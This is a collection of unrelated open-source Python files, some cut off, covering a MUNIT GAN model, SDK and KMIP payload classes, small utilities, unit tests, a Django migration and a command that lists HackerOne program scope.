assert opt.dataset_mode == 'unaligned'
valid_netGs = ['munit', 'mobile_munit']
assert opt.netG in valid_netGs
super(MunitModel, self).__init__(opt)
self.loss_names = ['D_A', 'G_rec_xA', 'G_rec_sA', 'G_rec_cA', 'G_gan_A',
'D_B', 'G_rec_xB', 'G_rec_sB', 'G_rec_cB', 'G_gan_B']
self.visual_names = ['real_A', 'fake_A', 'real_A', 'fake_B']
self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']
self.netG_A = networks.define_G(opt.netG, init_type=opt.init_type,
init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt)
self.netG_B = networks.define_G(opt.netG, init_type=opt.init_type,
init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt)
self.netD_A = networks.define_D(opt.netD, input_nc=opt.input_nc, init_type='normal',
init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt)
self.netD_B = networks.define_D(opt.netD, input_nc=opt.output_nc, init_type='normal',
init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt)
self.criterionGAN = GANLoss(opt.gan_mode).to(self.device)
self.criterionRec = nn.L1Loss()
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999), weight_decay=opt.weight_decay)
self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999), weight_decay=opt.weight_decay)
self.optimizers = [self.optimizer_G, self.optimizer_D]
self.eval_dataloader_AtoB = create_eval_dataloader(self.opt, direction='AtoB')
self.eval_dataloader_BtoA = create_eval_dataloader(self.opt, direction='BtoA')
self.inception_model, _, _ = create_metric_models(opt, self.device)
self.best_fid_A, self.best_fid_B = 1e9, 1e9
self.fids_A, self.fids_B = [], []
self.is_best = False
self.npz_A = np.load(opt.real_stat_A_path)
self.npz_B = np.load(opt.real_stat_B_path)
def set_input(self, input):
self.real_A = input['A'].to(self.device)
self.real_B = input['B'].to(self.device)
def set_single_input(self, input):
self.real_A = input['A'].to(self.device)
self.image_paths = input['A_paths']
def test_single_side(self, direction):
G_A = getattr(self, 'netG_%s' % direction[0])
G_B = getattr(self, 'netG_%s' % direction[-1])
opt = self.opt
batch_size = self.real_A.size(0)
style_dim = opt.style_dim
with torch.no_grad():
s = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
c, _ = G_A.encode(self.real_A, need_style=False)
self.fake_B = G_B.decode(c, s)
def forward(self, config=None):
raise NotImplementedError
def backward_G(self):
opt = self.opt
batch_size = self.real_A.size(0)
style_dim = opt.style_dim
s_a = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
s_b = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
# encode
c_a, s_a_prime = self.netG_A.encode(self.real_A)
c_b, s_b_prime = self.netG_B.encode(self.real_B)
# decode (within domain)
rec_A = self.netG_A.decode(c_a, s_a_prime)
rec_B = self.netG_B.decode(c_b, s_b_prime)
# decode (cross domain)
fake_A = self.netG_A.decode(c_b, s_a)
fake_B = self.netG_B.decode(c_a, s_b)
# encode again
c_b_recon, s_a_recon = self.netG_A.encode(fake_A)
c_a_recon, s_b_recon = self.netG_B.encode(fake_B)
# reconstruction loss
self.loss_G_rec_xA = opt.lambda_rec_x * self.criterionRec(rec_A, self.real_A)
self.loss_G_rec_xB = opt.lambda_rec_x * self.criterionRec(rec_B, self.real_B)
self.loss_G_rec_sA = opt.lambda_rec_s * self.criterionRec(s_a_recon, s_a)
self.loss_G_rec_sB = opt.lambda_rec_s * self.criterionRec(s_b_recon, s_b)
self.loss_G_rec_cA = opt.lambda_rec_c * self.criterionRec(c_a_recon, c_a)
self.loss_G_rec_cB = opt.lambda_rec_c * self.criterionRec(c_b_recon, c_b)
# gan loss
self.loss_G_gan_A = opt.lambda_gan * self.criterionGAN(self.netD_A(fake_A), True, for_discriminator=False)
self.loss_G_gan_B = opt.lambda_gan * self.criterionGAN(self.netD_B(fake_B), True, for_discriminator=False)
self.loss_G = self.loss_G_rec_xA + self.loss_G_rec_xB + \
self.loss_G_rec_sA + self.loss_G_rec_sB + \
self.loss_G_rec_cA + self.loss_G_rec_cB + \
self.loss_G_gan_A + self.loss_G_gan_B
self.loss_G.backward()
def backward_D(self):
opt = self.opt
batch_size = self.real_A.size(0)
style_dim = opt.style_dim
s_a = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
s_b = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
# encode
c_a, _ = self.netG_A.encode(self.real_A, need_style=False)
c_b, _ = self.netG_B.encode(self.real_B, need_style=False)
# decode (cross domain)
fake_A = self.netG_A.decode(c_b, s_a)
fake_B = self.netG_B.decode(c_a, s_b)
# gan loss
self.loss_D_A = opt.lambda_gan * (self.criterionGAN(self.netD_A(fake_A.detach()), False) +
self.criterionGAN(self.netD_A(self.real_A), True))
self.loss_D_B = opt.lambda_gan * (self.criterionGAN(self.netD_B(fake_B.detach()), False) +
self.criterionGAN(self.netD_B(self.real_B), True))
self.loss_D = self.loss_D_A + self.loss_D_B
self.loss_D.backward()
def optimize_parameters(self, steps):
self.set_requires_grad([self.netD_A, self.netD_B], False) # Ds require no gradients when optimizing Gs
self.optimizer_G.zero_grad()
self.backward_G()
self.optimizer_G.step()
self.set_requires_grad([self.netD_A, self.netD_B], True) # Ds require no gradients when optimizing Gs
self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero
self.backward_D() # calculate gradients for D_A and D_B
self.optimizer_D.step() # update D_A and D_B's weights
def profile(self, config=None, verbose=True):
raise NotImplementedError
def test(self, config=None):
with torch.no_grad():
self.forward(config)
def evaluate_model(self, step):
ret = {}
self.is_best = False
save_dir = os.path.join(self.opt.log_dir, 'eval', str(step))
os.makedirs(save_dir, exist_ok=True)
self.netG_A.eval()
self.netG_B.eval()
for direction in ['AtoB', 'BtoA']:
eval_dataloader = getattr(self, 'eval_dataloader_' + direction)
fakes, names = [], []
cnt = 0
for i, data_i in enumerate(tqdm(eval_dataloader, desc='Eval %s ' % direction, position=2, leave=False)):
self.set_single_input(data_i)
self.test_single_side(direction)
fakes.append(self.fake_B.cpu())
for j in range(len(self.image_paths)):
short_path = ntpath.basename(self.image_paths[j])
name = os.path.splitext(short_path)[0]
names.append(name)
if cnt < 10:
input_im = util.tensor2im(self.real_A[j])
fake_im = util.tensor2im(self.fake_B[j])
util.save_image(input_im, os.path.join(save_dir, direction, 'input', '%s.png' % name),
create_dir=True)
util.save_image(fake_im, os.path.join(save_dir, direction, 'fake', '%s.png' % name),
create_dir=True)
cnt += 1
suffix = direction[-1]
fid = get_fid(fakes, self.inception_model, getattr(self, 'npz_%s' % direction[-1]),
device=self.device, batch_size=self.opt.eval_batch_size, tqdm_position=2)
if fid < getattr(self, 'best_fid_%s' % suffix):
self.is_best = True
setattr(self, 'best_fid_%s' % suffix, fid)
fids = getattr(self, 'fids_%s' % suffix)
fids.append(fid)
if len(fids) > 3:
fids.pop(0)
ret['metric/fid_%s' % suffix] = fid
ret['metric/fid_%s-mean' % suffix] = sum(getattr(self, 'fids_%s' % suffix)) / len(
getattr(self, 'fids_%s' % suffix))
ret['metric/fid_%s-best' % suffix] = getattr(self, 'best_fid_%s' % suffix)
self.netG_A.train()
self.netG_B.train()
return ret
|
scripts/remove-multilabel-pairs.py | brmson/dataset-factoid-webquestions | 161 | 12729883 | <gh_stars>100-1000
#!/usr/bin/env python3
import csv, sys
file_name = sys.argv[1]
pos = {}
with open(file_name) as f:
r = csv.reader(f, delimiter=',')
for s in r:
if (s[0] == 'qtext'):
continue
key = s[0] + ',' + s[2]
if (s[1] == '1'):
if (key in pos):
pos[key] += 1
else:
pos[key] = 1
outcsv = csv.DictWriter(sys.stdout, fieldnames=['qtext', 'label', 'atext'])
outcsv.writeheader()
with open(file_name) as f:
r = csv.reader(f, delimiter=',')
for s in r:
if (s[0] == 'qtext'):
continue
key = s[0] + ',' + s[2]
if (key not in pos or s[1] == '1'):
outcsv.writerow({'qtext':s[0], 'label':s[1], 'atext':s[2]}) |
alipay/aop/api/response/ZhimaCreditContractBorrowQueryResponse.py | antopen/alipay-sdk-python-all | 213 | 12729904 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class ZhimaCreditContractBorrowQueryResponse(AlipayResponse):
def __init__(self):
super(ZhimaCreditContractBorrowQueryResponse, self).__init__()
self._status = None
self._subjects_borrowed = None
self._subjects_returned = None
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def subjects_borrowed(self):
return self._subjects_borrowed
@subjects_borrowed.setter
def subjects_borrowed(self, value):
self._subjects_borrowed = value
@property
def subjects_returned(self):
return self._subjects_returned
@subjects_returned.setter
def subjects_returned(self, value):
self._subjects_returned = value
def parse_response_content(self, response_content):
response = super(ZhimaCreditContractBorrowQueryResponse, self).parse_response_content(response_content)
if 'status' in response:
self.status = response['status']
if 'subjects_borrowed' in response:
self.subjects_borrowed = response['subjects_borrowed']
if 'subjects_returned' in response:
self.subjects_returned = response['subjects_returned']
|
web/vultargetspider/management/commands/HackeroneSpider.py | laozhudetui/LSpider | 311 | 12729917 | <reponame>laozhudetui/LSpider<filename>web/vultargetspider/management/commands/HackeroneSpider.py
#!/usr/bin/env python
# encoding: utf-8
'''
@author: LoRexxar
@contact: <EMAIL>
@file: HackeroneSpider.py
@time: 2020/4/22 15:05
@desc:
'''
from django.core.management.base import BaseCommand
from web.vultargetspider.controller.hackerone import HackeroneSpider
from utils.log import logger
import sys
import traceback
class Command(BaseCommand):
help = 'spider for hackerone'
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('appname', type=str)
def handle(self, *args, **options):
try:
if 'appname' not in options:
logger.error('[Hackerone Spider] no appname input.')
sys.exit(0)
logger.info("[Hackerone Spider] Hackerone {} Scope spider start.".format(options['appname']))
h = HackeroneSpider()
result_list = h.spider(options['appname'])
for result in result_list:
print(result)
except KeyboardInterrupt:
logger.warn("[Spider] stop monitor.")
sys.exit(0)
except:
logger.error("[Spider] something error, {}".format(traceback.format_exc()))
|
kmip/core/messages/payloads/delete_attribute.py | ondrap/PyKMIP | 179 | 12729938 | # Copyright (c) 2019 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from kmip.core import enums
from kmip.core import exceptions
from kmip.core import objects
from kmip.core import primitives
from kmip.core import utils
from kmip.core.messages.payloads import base
class DeleteAttributeRequestPayload(base.RequestPayload):
"""
A request payload for the DeleteAttribute operation.
Attributes:
unique_identifier: The unique ID of the object on which attribute
deletion should be performed.
attribute_name: The name of the attribute to be deleted. Used in
KMIP 1.0 - 1.4.
attribute_index: The index of the attribute to be deleted. Used in
KMIP 1.0 - 1.4.
current_attribute: The attribute to be deleted. Used in KMIP 2.0+.
attribute_reference: The reference to the attribute to be deleted.
Used in KMIP 2.0+.
"""
def __init__(self,
unique_identifier=None,
attribute_name=None,
attribute_index=None,
current_attribute=None,
attribute_reference=None):
"""
Construct a DeleteAttribute request payload.
Args:
unique_identifier (string): The unique ID of the object on which
attribute deletion should be performed. Optional, defaults to
None.
attribute_name (string): The name of the attribute to be deleted.
Used in KMIP 1.0 - 1.4. Defaults to None. Required for
read/write.
attribute_index (int): The index of the attribute to be deleted.
Used in KMIP 1.0 - 1.4. Optional, defaults to None.
current_attribute (struct): A CurrentAttribute structure containing
the attribute to be deleted. Used in KMIP 2.0+. Optional,
defaults to None. Must be specified if the attribute reference
is not provided.
attribute_reference (struct): An AttributeReference structure
containing a reference to the attribute to be deleted. Used in
KMIP 2.0+. Optional, defaults to None. Must be specified if the
current attribute is not specified.
"""
super(DeleteAttributeRequestPayload, self).__init__()
self._unique_identifier = None
self._attribute_name = None
self._attribute_index = None
self._current_attribute = None
self._attribute_reference = None
self.unique_identifier = unique_identifier
self.attribute_name = attribute_name
self.attribute_index = attribute_index
self.current_attribute = current_attribute
self.attribute_reference = attribute_reference
@property
def unique_identifier(self):
if self._unique_identifier:
return self._unique_identifier.value
return None
@unique_identifier.setter
def unique_identifier(self, value):
if value is None:
self._unique_identifier = None
elif isinstance(value, six.string_types):
self._unique_identifier = primitives.TextString(
value=value,
tag=enums.Tags.UNIQUE_IDENTIFIER
)
else:
raise TypeError("The unique identifier must be a string.")
@property
def attribute_name(self):
if self._attribute_name:
return self._attribute_name.value
return None
@attribute_name.setter
def attribute_name(self, value):
if value is None:
self._attribute_name = None
elif isinstance(value, six.string_types):
self._attribute_name = primitives.TextString(
value=value,
tag=enums.Tags.ATTRIBUTE_NAME
)
else:
raise TypeError("The attribute name must be a string.")
@property
def attribute_index(self):
if self._attribute_index:
return self._attribute_index.value
return None
@attribute_index.setter
def attribute_index(self, value):
if value is None:
self._attribute_index = None
elif isinstance(value, six.integer_types):
self._attribute_index = primitives.Integer(
value=value,
tag=enums.Tags.ATTRIBUTE_INDEX
)
else:
raise TypeError("The attribute index must be an integer.")
@property
def current_attribute(self):
if self._current_attribute:
return self._current_attribute
return None
@current_attribute.setter
def current_attribute(self, value):
if value is None:
self._current_attribute = None
elif isinstance(value, objects.CurrentAttribute):
self._current_attribute = value
else:
raise TypeError(
"The current attribute must be a CurrentAttribute object."
)
@property
def attribute_reference(self):
if self._attribute_reference:
return self._attribute_reference
return None
@attribute_reference.setter
def attribute_reference(self, value):
if value is None:
self._attribute_reference = None
elif isinstance(value, objects.AttributeReference):
self._attribute_reference = value
else:
raise TypeError(
"The attribute reference must be an AttributeReference object."
)
def read(self, input_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Read the data encoding the DeleteAttribute request payload and decode
it into its constituent part.
Args:
input_buffer (stream): A data stream containing encoded object
data, supporting a read method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be decoded. Optional,
defaults to KMIP 1.0.
Raises:
InvalidKmipEncoding: Raised if fields are missing from the
encoding.
"""
super(DeleteAttributeRequestPayload, self).read(
input_buffer,
kmip_version=kmip_version
)
local_buffer = utils.BytearrayStream(input_buffer.read(self.length))
if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_buffer):
self._unique_identifier = primitives.TextString(
tag=enums.Tags.UNIQUE_IDENTIFIER
)
self._unique_identifier.read(
local_buffer,
kmip_version=kmip_version
)
else:
self._unique_identifier = None
if kmip_version < enums.KMIPVersion.KMIP_2_0:
if self.is_tag_next(enums.Tags.ATTRIBUTE_NAME, local_buffer):
self._attribute_name = primitives.TextString(
tag=enums.Tags.ATTRIBUTE_NAME
)
self._attribute_name.read(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidKmipEncoding(
"The DeleteAttribute request payload encoding is missing "
"the attribute name field."
)
if self.is_tag_next(enums.Tags.ATTRIBUTE_INDEX, local_buffer):
self._attribute_index = primitives.Integer(
tag=enums.Tags.ATTRIBUTE_INDEX
)
self._attribute_index.read(
local_buffer,
kmip_version=kmip_version
)
else:
self._attribute_index = None
else:
if self.is_tag_next(enums.Tags.CURRENT_ATTRIBUTE, local_buffer):
self._current_attribute = objects.CurrentAttribute()
self._current_attribute.read(
local_buffer,
kmip_version=kmip_version
)
else:
self._current_attribute = None
if self.is_tag_next(enums.Tags.ATTRIBUTE_REFERENCE, local_buffer):
self._attribute_reference = objects.AttributeReference()
self._attribute_reference.read(
local_buffer,
kmip_version=kmip_version
)
else:
self._attribute_reference = None
if self._current_attribute == self._attribute_reference:
raise exceptions.InvalidKmipEncoding(
"The DeleteAttribute encoding is missing either the "
"current attribute or the attribute reference field."
)
self.is_oversized(local_buffer)
def write(self, output_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Write the data encoding the DeleteAttribute request payload to a
stream.
Args:
output_buffer (stream): A data stream in which to encode object
data, supporting a write method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be encoded. Optional,
defaults to KMIP 1.0.
Raises:
InvalidField
"""
local_buffer = utils.BytearrayStream()
if self._unique_identifier:
self._unique_identifier.write(
local_buffer,
kmip_version=kmip_version
)
if kmip_version < enums.KMIPVersion.KMIP_2_0:
if self._attribute_name:
self._attribute_name.write(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidField(
"The DeleteAttribute request payload is missing the "
"attribute name field."
)
if self._attribute_index:
self._attribute_index.write(
local_buffer,
kmip_version=kmip_version
)
else:
if self._current_attribute == self._attribute_reference:
raise exceptions.InvalidField(
"The DeleteAttribute request payload is missing either "
"the current attribute or the attribute reference field."
)
if self._current_attribute:
self._current_attribute.write(
local_buffer,
kmip_version=kmip_version
)
if self._attribute_reference:
self._attribute_reference.write(
local_buffer,
kmip_version=kmip_version
)
self.length = local_buffer.length()
super(DeleteAttributeRequestPayload, self).write(
output_buffer,
kmip_version=kmip_version
)
output_buffer.write(local_buffer.buffer)
def __repr__(self):
args = [
"unique_identifier='{}'".format(self.unique_identifier),
"attribute_name='{}'".format(self.attribute_name),
"attribute_index={}".format(self.attribute_index),
"current_attribute={}".format(repr(
self.current_attribute
) if self.current_attribute else None),
"attribute_reference={}".format(repr(
self.attribute_reference
) if self.attribute_reference else None)
]
return "DeleteAttributeRequestPayload({})".format(", ".join(args))
def __str__(self):
return str(
{
"unique_identifier": self.unique_identifier,
"attribute_name": self.attribute_name,
"attribute_index": self.attribute_index,
"current_attribute": str(
self.current_attribute
) if self.current_attribute else None,
"attribute_reference": str(
self.attribute_reference
) if self.attribute_reference else None
}
)
def __eq__(self, other):
if isinstance(other, DeleteAttributeRequestPayload):
if self.unique_identifier != other.unique_identifier:
return False
elif self.attribute_name != other.attribute_name:
return False
elif self.attribute_index != other.attribute_index:
return False
elif self.current_attribute != other.current_attribute:
return False
elif self.attribute_reference != other.attribute_reference:
return False
else:
return True
else:
return NotImplemented
def __ne__(self, other):
if isinstance(other, DeleteAttributeRequestPayload):
return not self.__eq__(other)
else:
return NotImplemented
class DeleteAttributeResponsePayload(base.ResponsePayload):
"""
A response payload for the DeleteAttribute operation.
Attributes:
unique_identifier: The unique ID of the object on which attribute
deletion was performed. Optional, defaults to None.
attribute: The attribute object deleted from the managed object. Used
in KMIP 1.0 - 1.4.
"""
def __init__(self, unique_identifier=None, attribute=None):
"""
Construct a DeleteAttribute response payload.
Args:
unique_identifier (string): The unique ID of the object on
which attribute deletion was performed. Defaults to None.
Required for read/write.
attribute (struct): An Attribute object containing the attribute
that was deleted. Used in KMIP 1.0 - 1.4. Defaults to None.
Required for read/write.
"""
super(DeleteAttributeResponsePayload, self).__init__()
self._unique_identifier = None
self._attribute = None
self.unique_identifier = unique_identifier
self.attribute = attribute
@property
def unique_identifier(self):
if self._unique_identifier:
return self._unique_identifier.value
return None
@unique_identifier.setter
def unique_identifier(self, value):
if value is None:
self._unique_identifier = None
elif isinstance(value, six.string_types):
self._unique_identifier = primitives.TextString(
value=value,
tag=enums.Tags.UNIQUE_IDENTIFIER
)
else:
raise TypeError("The unique identifier must be a string.")
@property
def attribute(self):
if self._attribute:
return self._attribute
return None
@attribute.setter
def attribute(self, value):
if value is None:
self._attribute = None
elif isinstance(value, objects.Attribute):
self._attribute = value
else:
raise TypeError(
"The attribute must be an Attribute object."
)
def read(self, input_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Read the data encoding the DeleteAttribute response payload and decode
it into its constituent parts.
Args:
input_buffer (stream): A data stream containing encoded object
data, supporting a read method; usually a BytearrayStream
object.
kmip_version (enum): A KMIPVersion enumeration defining the KMIP
version with which the object will be decoded. Optional,
defaults to KMIP 1.0.
Raises:
InvalidKmipEncoding: Raised if any required fields are missing
from the encoding.
"""
super(DeleteAttributeResponsePayload, self).read(
input_buffer,
kmip_version=kmip_version
)
local_buffer = utils.BytearrayStream(input_buffer.read(self.length))
if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_buffer):
self._unique_identifier = primitives.TextString(
tag=enums.Tags.UNIQUE_IDENTIFIER
)
self._unique_identifier.read(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidKmipEncoding(
"The DeleteAttribute response payload encoding is missing the "
"unique identifier field."
)
if kmip_version < enums.KMIPVersion.KMIP_2_0:
if self.is_tag_next(enums.Tags.ATTRIBUTE, local_buffer):
self._attribute = objects.Attribute()
self._attribute.read(local_buffer, kmip_version=kmip_version)
else:
raise exceptions.InvalidKmipEncoding(
"The DeleteAttribute response payload encoding is missing "
"the attribute field."
)
self.is_oversized(local_buffer)
def write(self, output_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Write the data encoding the DeleteAttribute response payload to a
buffer.
Args:
output_buffer (buffer): A data buffer in which to encode object
data, supporting a write method; usually a BytearrayStream
object.
kmip_version (enum): A KMIPVersion enumeration defining the KMIP
version with which the object will be encoded. Optional,
defaults to KMIP 1.0.
Raises:
InvalidField: Raised if a required field is missing from the
payload object.
"""
local_buffer = utils.BytearrayStream()
if self._unique_identifier:
self._unique_identifier.write(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidField(
"The DeleteAttribute response payload is missing the unique "
"identifier field."
)
if kmip_version < enums.KMIPVersion.KMIP_2_0:
if self._attribute:
self._attribute.write(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidField(
"The DeleteAttribute response payload is missing the "
"attribute field."
)
self.length = local_buffer.length()
super(DeleteAttributeResponsePayload, self).write(
output_buffer,
kmip_version=kmip_version
)
output_buffer.write(local_buffer.buffer)
def __repr__(self):
args = [
"unique_identifier='{}'".format(self.unique_identifier),
"attribute={}".format(repr(self.attribute))
]
return "DeleteAttributeResponsePayload({})".format(", ".join(args))
def __str__(self):
return str(
{
"unique_identifier": self.unique_identifier,
"attribute": str(self.attribute)
}
)
def __eq__(self, other):
if isinstance(other, DeleteAttributeResponsePayload):
if self.unique_identifier != other.unique_identifier:
return False
elif self.attribute != other.attribute:
return False
else:
return True
return NotImplemented
def __ne__(self, other):
if isinstance(other, DeleteAttributeResponsePayload):
return not self.__eq__(other)
return NotImplemented
|
h2o-hadoop-common/tests/python/pyunit_gcs_import.py | kernelrich/h2o-3 | 6,098 | 12729987 | #! /usr/env/python
import sys
import os
sys.path.insert(1, os.path.join("../../../h2o-py"))
from tests import pyunit_utils
import h2o
def gcs_import():
# Just test the import works - no class clashes, no exception
keys = h2o.import_file(
"gs://gcp-public-data-nexrad-l2/2018/01/01/KABR/NWS_NEXRAD_NXL2DPBL_KABR_20180101050000_20180101055959.tar",
parse=False)
assert len(keys) == 1
assert keys == [
'gs://gcp-public-data-nexrad-l2/2018/01/01/KABR/NWS_NEXRAD_NXL2DPBL_KABR_20180101050000_20180101055959.tar']
expected_keys = [
'gs://gcp-public-data-nexrad-l2/1991/06/05/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910605160000_19910605235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606000000_19910606075959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606080000_19910606155959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606160000_19910606235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/07/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910607160000_19910607235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/08/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910608000000_19910608075959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/08/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910608080000_19910608155959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/09/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910609160000_19910609235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/10/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910610000000_19910610075959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/10/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910610080000_19910610155959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/22/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910622160000_19910622235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/23/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910623000000_19910623075959.tar']
# Import folder
keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06", parse=False)
assert len(keys) == 12
assert keys == expected_keys
# Import folder - slash at the end of path
keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06/", parse=False)
assert len(keys) == 12
assert keys == expected_keys
# Import folder - Invalid path
keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06/somethingNonExistent/", parse=False)
assert len(keys) == 0
if __name__ == "__main__":
pyunit_utils.standalone_test(gcs_import)
else:
gcs_import()
|
koku/masu/util/hash.py | rubik-ai/koku | 157 | 12730014 | <filename>koku/masu/util/hash.py
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Hashing utility."""
import hashlib
from masu.exceptions import HasherError
class Hasher:
"""A utility class to create hashes."""
def __init__(self, hash_function, length=None, encoding="utf-8"):
"""Initialize the Hasher.
Args:
hash_function (str): String representation of hash function
Ex. 'md5'
length (int): The digest length for SHAKE algorithms
encoding (str): Encoding used to convert string to bytes
Returns:
(Hasher): the initialized Hasher
"""
self.length = length
self.hash_function = hash_function
self.encoding = encoding
def get_hash_function(self):
"""Get the hash function."""
return self._hash_function
def set_hash_function(self, hash_function):
"""Set the hash function used.
Args:
hash_function (str): String representation of hash function
Ex. 'md5'
Returns:
(hashlib hash function)
"""
if "shake" in hash_function and not self.length:
errmsg = f"{hash_function} requires length to be set"
raise HasherError(errmsg)
self._hash_function = getattr(hashlib, hash_function, None)
if not self._hash_function:
errmsg = f"{hash_function} is not currently supported."
if hash_function in hashlib.algorithms_guaranteed:
errmsg = f"{hash_function} needs Hasher implementation."
raise HasherError(errmsg)
def hash_string_to_hex(self, string):
"""Return a hex digest of the hashed string.
Args:
string (str): The string to be hashed
Returns:
(str): The hex string of the hash
"""
if self.length:
return self.hash_function(string.encode(self.encoding)).hexdigest(self.length)
return self.hash_function(string.encode(self.encoding)).hexdigest()
hash_function = property(get_hash_function, set_hash_function)
|
dialogue-engine/test/programytest/storage/stores/sql/dao/test_node.py | cotobadesign/cotoba-agent-oss | 104 | 12730018 | <reponame>cotobadesign/cotoba-agent-oss<gh_stars>100-1000
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.storage.stores.sql.dao.node import PatternNode
from programy.storage.stores.sql.dao.node import TemplateNode
class PatternNodeTests(unittest.TestCase):
def test_init(self):
node1 = PatternNode(name='name', node_class='class')
self.assertIsNotNone(node1)
self.assertEqual("<Pattern Node(id='n/a', name='name', node_class='class')>", str(node1))
node2 = PatternNode(id=1, name='name', node_class='class')
self.assertIsNotNone(node2)
self.assertEqual("<Pattern Node(id='1', name='name', node_class='class')>", str(node2))
class TemplateNodeTests(unittest.TestCase):
def test_init(self):
node1 = TemplateNode(name='name', node_class='class')
self.assertIsNotNone(node1)
self.assertEqual("<Template Node(id='n/a', name='name', node_class='class')>", str(node1))
node2 = TemplateNode(id=1, name='name', node_class='class')
self.assertIsNotNone(node2)
self.assertEqual("<Template Node(id='1', name='name', node_class='class')>", str(node2))
|
InvenTree/build/migrations/0030_alter_build_reference.py | carlos-riquelme/InvenTree | 656 | 12730024 | <reponame>carlos-riquelme/InvenTree<filename>InvenTree/build/migrations/0030_alter_build_reference.py
# Generated by Django 3.2.4 on 2021-07-08 14:14
import InvenTree.validators
import build.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('build', '0029_auto_20210601_1525'),
]
operations = [
migrations.AlterField(
model_name='build',
name='reference',
field=models.CharField(default=build.models.get_next_build_number, help_text='Build Order Reference', max_length=64, unique=True, validators=[InvenTree.validators.validate_build_order_reference], verbose_name='Reference'),
),
]
|
test/hummingbot/connector/derivative/binance_perpetual/test_binance_perpetual_web_utils.py | pecuniafinance/hummingbot | 542 | 12730050 | <reponame>pecuniafinance/hummingbot
import asyncio
import unittest
from typing import Awaitable
import hummingbot.connector.derivative.binance_perpetual.binance_perpetual_web_utils as web_utils
